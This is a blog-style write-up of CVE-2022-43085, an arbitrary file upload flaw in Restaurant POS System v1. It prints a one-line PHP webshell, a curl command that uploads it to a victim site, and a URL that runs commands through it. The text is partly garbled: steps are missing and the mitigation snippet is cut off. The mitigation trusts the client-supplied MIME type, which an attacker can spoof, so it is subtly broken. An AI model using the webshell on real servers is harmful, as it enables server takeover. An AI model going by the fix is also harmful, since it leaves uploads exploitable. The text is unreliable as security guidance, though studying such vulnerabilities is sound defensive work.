CVE-2022-43085 - Hacking Restaurant POS System v1. via Arbitrary File Upload

*Published: June 2024*


CVE-2022-43085 is a critical vulnerability found in the *Restaurant POS System v1.*. This vulnerability allows a hacker to upload any file, including a crafted PHP shell, and execute code right on the server. In this article, I'm going to walk you through what this flaw is, how it works, and even demonstrate an example exploit. I'll also share the best solutions and references for learning more. Let's dive in.

Type: Arbitrary File Upload → Remote Code Execution

- CVE Page: NVD Details

The point of weakness lies in the file-upload logic of the add_product.php script. Because this script does not properly validate uploaded files, an attacker can upload malicious PHP code. If they then access their file via the web, the server will execute it, giving the attacker full control.

Here's a simple webshell you can use to test the exploit

<?php system($_GET['cmd']); ?>

Exploit Details: Step-by-Step Guide

Suppose the "Add Product" feature lets you upload images for menu items—maybe product_image is the parameter name.

Example curl request

curl -F "product_image=@shell.php" -F "product_name=Exploit" http://[victim-site]/add_product.php

3. Find the Upload Directory

Usually, the script will store your uploaded file in a folder like /uploads/ or /images/.

Open

http://[victim-site]/uploads/shell.php?cmd=whoami

Missing File Type Check: The code does not verify if the upload is really an image.

- Server Executes Uploaded PHP: If uploaded files are saved in a web-accessible directory, the PHP server will parse them.

Code Snippet From add_product.php (What Might Look Vulnerable)

// Pseudo-code snippet representing an insecure upload
if(isset($_FILES['product_image'])){
    move_uploaded_file($_FILES['product_image']['tmp_name'], "uploads/" . $_FILES['product_image']['name']);
    // No file type checks!
}

`php

$allowed_types = ['image/jpeg', 'image/png'];

if(in_array($_FILES['product_image']['type'], $allowed_types)) {

// proceed with upload
  }

References

- Original CVE Entry - NIST
- Exploit Details on Exploit-DB *(example)*
- Common PHP Upload Mistakes
- OWASP: Unrestricted File Upload

Conclusion

CVE-2022-43085 is a textbook example of how dangerous an arbitrary file upload bug is. It takes little effort for an attacker to gain complete control when basic checks are skipped. Restaurant POS admins must patch this ASAP, restrict file types, and consider blocking PHP execution in their uploads directory.

Stay safe. Patch your apps. Always validate your uploads!

*If you are interested in a proof-of-concept for live testing or are responsible for patching this vulnerability, always do it in a legal, controlled environment.*

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/02/2022 15:35:00 UTC